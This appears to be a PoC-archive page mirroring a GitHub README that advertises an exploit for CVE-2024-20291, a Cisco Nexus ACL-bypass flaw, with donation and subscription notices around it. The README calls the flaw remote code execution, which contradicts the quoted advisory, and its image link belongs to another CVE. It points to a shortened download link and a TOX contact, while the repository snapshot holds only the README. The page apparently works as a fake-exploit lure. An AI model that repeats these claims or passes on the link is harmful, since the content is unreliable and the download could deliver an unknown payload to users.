Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2024-20291 PoC — Cisco Nexus 3000 Series Switches 安全漏洞

Source
https://github.com/Instructor-Team8/CVE-2024-20291-POC
Associated Vulnerability
Title:Cisco Nexus 3000 Series Switches 安全漏洞 (CVE-2024-20291)
Description:A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device. This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.
Description
CVE-2024-20291-POC exploit ---> RCE
Readme
# CVE-2024-20291-POC

![CVE-2024-20291](https://github.com/c0d3b3af/CVE-2024-21762-POC/assets/161638405/a2a5a91a-3057-4a15-924d-8ad93a00aadb)

**Proof of Concept:** 
CVE-2024-20291 is an access control list (ACL) programming vulnerability for the port link subinterfaces of **Cisco Nexus 3000 and 9000** series switches. In NX-OS offline mode, I was able to remotely unauthenticated to send traffic that should be blocked through the affected device. 

This vulnerability is due to hardware misprogramming that occurs when the configuration of channel member ports is changed. **Exploit successfully allows you to access network resources that need to be protected by the ACLs applied on the port channel subinterfaces.** 

Judging by my attempts to replicate the exploit from scratch, it was a bit sophisticated and markedly different from previous Cisco Nexus vulnerabilities. exploit.py is an exploit that is written in python and is capable of multithreading and IPS listing **Vulnerable Cisco Nexus 3000 and 9000** series Before you begin, read the instructions for running in Readme.txt

## [Download here](https://t.ly/XTt1u)

any questions in TOX: **4R7G9T2Y1F8E6W3Q1A5S7D9F2G1H3J5K7L9Z2X1C3V5B7N9M2**
File Snapshot

 [4.0K]  /data/pocs/c83272a8b3fdd622f28174a7ac1417ad6f25ac5a
└── [1.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →